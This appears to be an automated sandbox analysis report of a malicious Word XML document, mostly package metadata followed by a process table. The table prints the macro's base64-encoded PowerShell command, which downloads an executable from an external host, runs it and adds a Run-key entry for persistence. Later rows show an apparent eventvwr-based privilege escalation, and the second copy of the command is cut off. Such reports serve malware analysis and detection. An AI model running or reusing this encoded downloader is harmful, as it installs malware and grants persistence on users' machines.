| File name: | 23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c |
| Full analysis: | https://app.any.run/tasks/d47ed706-3122-40d3-917d-78c117afd068 |
| Verdict: | Malicious activity |
| Analysis date: | November 08, 2018, 06:34:32 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/xml |
| File info: | XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators |
| MD5: | D6A5B472987763190497C24D0DFD74E8 |
| SHA1: | A2228CEA5A43695656F6B5D531D56CB4C963030E |
| SHA256: | 23FA88BBAB4EC6EC9125733D367295ACE6E828CA670A88E979FCDDFF1D63A77C |
| SSDEEP: | 6144:N/lA5ANOZbg144HsiI1wFwo2ywm7THlYx15Gw4rqYetVp:N/lA5ANORKHsiI1w5dnFcgbrqYetVp |
| .xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (42.2) |
|---|---|---|
| .rels | | | Open Office XML Relationships (27.2) |
| .xml | | | Microsoft Office XML Flat File Format (ASCII) (20.1) |
| .svg | | | Scalable Vector Graphics (var.3) (4.3) |
| .opml/xml | | | Outline Processor Markup Language (3.4) |
| PackagePartName: | /_rels/.rels |
|---|---|
| PackagePartContentType: | application/vnd.openxmlformats-package.relationships+xml |
| PackagePartPadding: | 512 |
| PackagePartXmlDataRelationshipsXmlns: | http://schemas.openxmlformats.org/package/2006/relationships |
| PackagePartXmlDataRelationshipsRelationshipId: | rId3 |
| PackagePartXmlDataRelationshipsRelationshipType: | http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties |
| PackagePartXmlDataRelationshipsRelationshipTarget: | docProps/app.xml |
| PackagePartXmlDataDocumentIgnorable: | w14 w15 w16se w16cid wp14 |
| PackagePartXmlDataDocumentBodyPRsidR: | 00184900 |
| PackagePartXmlDataDocumentBodyPRsidRDefault: | 00184900 |
| PackagePartXmlDataDocumentBodyPBookmarkStartId: | - |
| PackagePartXmlDataDocumentBodyPBookmarkStartName: | _GoBack |
| PackagePartXmlDataDocumentBodyPBookmarkEndId: | - |
| PackagePartXmlDataDocumentBodyPRRPrNoProof: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: | 5943600 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: | 4093845 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: | 1905 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: | Picture 1 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: | http://schemas.openxmlformats.org/drawingml/2006/picture |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: | rId5 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: | {28A0092B-C50C-407E-A947-70E740481C1C} |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: | 5943600 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: | 4093845 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: | rect |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: | - |
| PackagePartXmlDataDocumentBodySectPrRsidR: | 00184900 |
| PackagePartXmlDataDocumentBodySectPrPgSzW: | 12240 |
| PackagePartXmlDataDocumentBodySectPrPgSzH: | 15840 |
| PackagePartXmlDataDocumentBodySectPrPgMarTop: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarRight: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarBottom: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarLeft: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarHeader: | 720 |
| PackagePartXmlDataDocumentBodySectPrPgMarFooter: | 720 |
| PackagePartXmlDataDocumentBodySectPrPgMarGutter: | - |
| PackagePartXmlDataDocumentBodySectPrColsSpace: | 720 |
| PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: | 360 |
| PackagePartBinaryData: | (Binary data 75668 bytes, use -b option to extract) |
| PackagePartCompression: | store |
| PackagePartXmlDataThemeName: | Office Theme |
| PackagePartXmlDataThemeThemeElementsClrSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: | windowText |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: | 000000 |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: | window |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: | FFFFFF |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: | 44546A |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: | E7E6E6 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: | 4472C4 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: | ED7D31 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: | A5A5A5 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: | FFC000 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: | 5B9BD5 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: | 70AD47 |
| PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: | 0563C1 |
| PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: | 954F72 |
| PackagePartXmlDataThemeThemeElementsFontSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: | Calibri Light |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: | 020F0302020204030204 |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: | Jpan |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: | 游ゴシック Light |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: | Calibri |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: | 020F0502020204030204 |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: | Jpan |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: | 游明朝 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: | 1 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 110000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 105000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 67000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 100000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: | 6350 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: | flat |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: | sng |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: | ctr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: | solid |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: | 800000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: | 57150 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: | 19050 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: | ctr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: | 000000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: | 63000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: | 95000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: | 170000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: | 1 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 93000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 150000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 98000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 102000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: | - |
| PackagePartXmlDataThemeObjectDefaults: | - |
| PackagePartXmlDataThemeExtraClrSchemeLst: | - |
| PackagePartXmlDataThemeExtLstExtUri: | {05A4C25C-085E-4340-85A3-A5531E510DB2} |
| PackagePartXmlDataThemeExtLstExtThemeFamilyName: | Office Theme |
| PackagePartXmlDataThemeExtLstExtThemeFamilyId: | {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F} |
| PackagePartXmlDataThemeExtLstExtThemeFamilyVid: | {4A3C46E8-61CC-4603-A589-7422A47A8E4A} |
| PackagePartXmlDataVbaSuppDataIgnorable: | w14 w15 w16se w16cid wp14 |
| PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: | - |
| PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: | PROJECT.C_N1XNTEHWRD.G_ZNFYBNIXNZWXMEK8KG |
| PackagePartXmlDataVbaSuppDataMcdsMcdName: | Project.c_n1xntEhWrd.G_znFYBNiXnZwXMek8kG |
| PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: | 00 |
| PackagePartXmlDataVbaSuppDataMcdsMcdCmg: | 56 |
| PackagePartXmlDataSettingsIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataSettingsZoomPercent: | 100 |
| PackagePartXmlDataSettingsDefaultTabStopVal: | 720 |
| PackagePartXmlDataSettingsCharacterSpacingControlVal: | doNotCompress |
| PackagePartXmlDataSettingsCompatCompatSettingName: | compatibilityMode |
| PackagePartXmlDataSettingsCompatCompatSettingUri: | http://schemas.microsoft.com/office/word |
| PackagePartXmlDataSettingsCompatCompatSettingVal: | 15 |
| PackagePartXmlDataSettingsRsidsRsidRootVal: | 00184900 |
| PackagePartXmlDataSettingsRsidsRsidVal: | 00184900 |
| PackagePartXmlDataSettingsMathPrMathFontVal: | Cambria Math |
| PackagePartXmlDataSettingsMathPrBrkBinVal: | before |
| PackagePartXmlDataSettingsMathPrBrkBinSubVal: | -- |
| PackagePartXmlDataSettingsMathPrSmallFracVal: | - |
| PackagePartXmlDataSettingsMathPrDispDef: | - |
| PackagePartXmlDataSettingsMathPrLMarginVal: | - |
| PackagePartXmlDataSettingsMathPrRMarginVal: | - |
| PackagePartXmlDataSettingsMathPrDefJcVal: | centerGroup |
| PackagePartXmlDataSettingsMathPrWrapIndentVal: | 1440 |
| PackagePartXmlDataSettingsMathPrIntLimVal: | subSup |
| PackagePartXmlDataSettingsMathPrNaryLimVal: | undOvr |
| PackagePartXmlDataSettingsThemeFontLangVal: | en-US |
| PackagePartXmlDataSettingsClrSchemeMappingBg1: | light1 |
| PackagePartXmlDataSettingsClrSchemeMappingT1: | dark1 |
| PackagePartXmlDataSettingsClrSchemeMappingBg2: | light2 |
| PackagePartXmlDataSettingsClrSchemeMappingT2: | dark2 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent1: | accent1 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent2: | accent2 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent3: | accent3 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent4: | accent4 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent5: | accent5 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent6: | accent6 |
| PackagePartXmlDataSettingsClrSchemeMappingHyperlink: | hyperlink |
| PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: | followedHyperlink |
| PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: | 1026 |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: | 1 |
| PackagePartXmlDataSettingsDecimalSymbolVal: | . |
| PackagePartXmlDataSettingsListSeparatorVal: | , |
| PackagePartXmlDataSettingsChartTrackingRefBased: | - |
| PackagePartXmlDataSettingsDocIdVal: | {D3F60254-1C5C-4604-83DB-73C38CBCD213} |
| PackagePartXmlDataPropertiesXmlns: | http://schemas.openxmlformats.org/officeDocument/2006/extended-properties |
| PackagePartXmlDataPropertiesTemplate: | Normal.dotm |
| PackagePartXmlDataPropertiesTotalTime: | - |
| PackagePartXmlDataPropertiesPages: | 1 |
| PackagePartXmlDataPropertiesWords: | - |
| PackagePartXmlDataPropertiesCharacters: | 1 |
| PackagePartXmlDataPropertiesApplication: | Microsoft Office Word |
| PackagePartXmlDataPropertiesDocSecurity: | - |
| PackagePartXmlDataPropertiesLines: | 1 |
| PackagePartXmlDataPropertiesParagraphs: | 1 |
| PackagePartXmlDataPropertiesScaleCrop: | - |
| PackagePartXmlDataPropertiesCompany: | - |
| PackagePartXmlDataPropertiesLinksUpToDate: | - |
| PackagePartXmlDataPropertiesCharactersWithSpaces: | 1 |
| PackagePartXmlDataPropertiesSharedDoc: | - |
| PackagePartXmlDataPropertiesHyperlinksChanged: | - |
| PackagePartXmlDataPropertiesAppVersion: | 16 |
| PackagePartXmlDataStylesIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: | minorBidi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: | 22 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: | 22 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: | en-US |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: | en-US |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: | ar-SA |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: | 160 |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: | 259 |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: | auto |
| PackagePartXmlDataStylesLatentStylesDefLockedState: | - |
| PackagePartXmlDataStylesLatentStylesDefUIPriority: | 99 |
| PackagePartXmlDataStylesLatentStylesDefSemiHidden: | - |
| PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: | - |
| PackagePartXmlDataStylesLatentStylesDefQFormat: | - |
| PackagePartXmlDataStylesLatentStylesCount: | 375 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionName: | Normal |
| PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: | - |
| PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: | 1 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: | 1 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: | 1 |
| PackagePartXmlDataStylesStyleType: | paragraph |
| PackagePartXmlDataStylesStyleDefault: | 1 |
| PackagePartXmlDataStylesStyleStyleId: | Normal |
| PackagePartXmlDataStylesStyleNameVal: | Normal |
| PackagePartXmlDataStylesStyleQFormat: | - |
| PackagePartXmlDataStylesStyleUiPriorityVal: | 1 |
| PackagePartXmlDataStylesStyleSemiHidden: | - |
| PackagePartXmlDataStylesStyleUnhideWhenUsed: | - |
| PackagePartXmlDataStylesStyleTblPrTblIndW: | - |
| PackagePartXmlDataStylesStyleTblPrTblIndType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: | - |
| PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: | 108 |
| PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: | - |
| PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: | 108 |
| PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: | dxa |
| PackagePartXmlDataCorePropertiesTitle: | - |
| PackagePartXmlDataCorePropertiesSubject: | - |
| PackagePartXmlDataCorePropertiesCreator: | Dimitri czar |
| PackagePartXmlDataCorePropertiesKeywords: | - |
| PackagePartXmlDataCorePropertiesDescription: | - |
| PackagePartXmlDataCorePropertiesLastModifiedBy: | Dimitri czar |
| PackagePartXmlDataCorePropertiesRevision: | 1 |
| PackagePartXmlDataCorePropertiesCreatedType: | dcterms:W3CDTF |
| PackagePartXmlDataCorePropertiesCreated: | 2018:11:07 12:17:00Z |
| PackagePartXmlDataCorePropertiesModifiedType: | dcterms:W3CDTF |
| PackagePartXmlDataCorePropertiesModified: | 2018:11:07 12:17:00Z |
| PackagePartXmlDataFontsIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataFontsFontName: | Calibri |
| PackagePartXmlDataFontsFontPanose1Val: | 020F0502020204030204 |
| PackagePartXmlDataFontsFontCharsetVal: | 00 |
| PackagePartXmlDataFontsFontFamilyVal: | swiss |
| PackagePartXmlDataFontsFontPitchVal: | variable |
| PackagePartXmlDataFontsFontSigUsb0: | E0002AFF |
| PackagePartXmlDataFontsFontSigUsb1: | C000247B |
| PackagePartXmlDataFontsFontSigUsb2: | 00000009 |
| PackagePartXmlDataFontsFontSigUsb3: | 00000000 |
| PackagePartXmlDataFontsFontSigCsb0: | 000001FF |
| PackagePartXmlDataFontsFontSigCsb1: | 00000000 |
| PackagePartXmlDataWebSettingsIgnorable: | w14 w15 w16se w16cid |
| PackagePartXmlDataWebSettingsOptimizeForBrowser: | - |
| PackagePartXmlDataWebSettingsAllowPNG: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 584 | "C:\Users\admin\OTCkeomF.exe" | C:\Users\admin\OTCkeomF.exe | — | powershell.exe | |||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: MEDIUM Description: Skype Exit code: 0 Version: 0.0.0.0 Modules
| |||||||||||||||
| 944 | "C:\Users\admin\OTCkeomF.exe" | C:\Users\admin\OTCkeomF.exe | — | eventvwr.exe | |||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: HIGH Description: Skype Exit code: 0 Version: 0.0.0.0 Modules
| |||||||||||||||
| 1960 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | OTCkeomF.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2020 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | OTCkeomF.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2504 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2748 | cmD /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBxADUAQwB1AFMAdgBmAHYAegB4AF8AawBLAE0ASAA4AEwAQQA1AGcAYgBOAHYAIAAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQA7AHMAdABhAHIAdAAgACQAdwBVAG8AVwBpAG4ARwB4AGIAZwBhAGsASwBnAG0AYQBIAHQAbAAgADsAIAANAAoAfQANAAoAdAByAHkAewANAAoADQAKACQAUwBVAGIARwBrAF8ANAAyAEMAOQA4AE0AQQBlAGsAVwBHAHoAbQBIADkAagA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwATwBUAEMAawBlAG8AbQBGAC4AZQB4AGUAJwA7AA0ACgBFAHEANQBDAHUAUwB2AGYAdgB6AHgAXwBrAEsATQBIADgATABBADUAZwBiAE4AdgAgACcAaAB0AHQAcABzADoALwAvAGUALgBjAG8AawBhAC4AbABhAC8AVQBJAEkAQwBiADYALgBqAHAAZwAnACAAJABTAFUAYgBHAGsAXwA0ADIAQwA5ADgATQBBAGUAawBXAEcAegBtAEgAOQBqADsADQAKACQARABWAFgAZQBlAEUANwBqAG0AaQBwAFQANwBYAFAAVQBPAHAAUAB1AEIANQBDAG4AdwBDAFEAVAAgAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABPAFQAQwBrAGUAbwBtAEYALgBlAHgAZQAnADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACcAMQAwADEAMAAxADAAMQAnACAALQBWAGEAbAB1AGUAIAAkAEQAVgBYAGUAZQBFADcAagBtAGkAcABUADcAWABQAFUATwBwAFAAdQBCADUAQwBuAHcAQwBRAFQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAJwBTAHQAcgBpAG4AZwAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\system32\cmD.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3204 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 Modules
| |||||||||||||||
| 3780 | PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBxADUAQwB1AFMAdgBmAHYAegB4AF8AawBLAE0ASAA4AEwAQQA1AGcAYgBOAHYAIAAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQA7AHMAdABhAHIAdAAgACQAdwBVAG8AVwBpAG4ARwB4AGIAZwBhAGsASwBnAG0AYQBIAHQAbAAgADsAIAANAAoAfQANAAoAdAByAHkAewANAAoADQAKACQAUwBVAGIARwBrAF8ANAAyAEMAOQA4AE0AQQBlAGsAVwBHAHoAbQBIADkAagA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwATwBUAEMAawBlAG8AbQBGAC4AZQB4AGUAJwA7AA0ACgBFAHEANQBDAHUAUwB2AGYAdgB6AHgAXwBrAEsATQBIADgATABBADUAZwBiAE4AdgAgACcAaAB0AHQAcABzADoALwAvAGUALgBjAG8AawBhAC4AbABhAC8AVQBJAEkAQwBiADYALgBqAHAAZwAnACAAJABTAFUAYgBHAGsAXwA0ADIAQwA5ADgATQBBAGUAawBXAEcAegBtAEgAOQBqADsADQAKACQARABWAFgAZQBlAEUANwBqAG0AaQBwAFQANwBYAFAAVQBP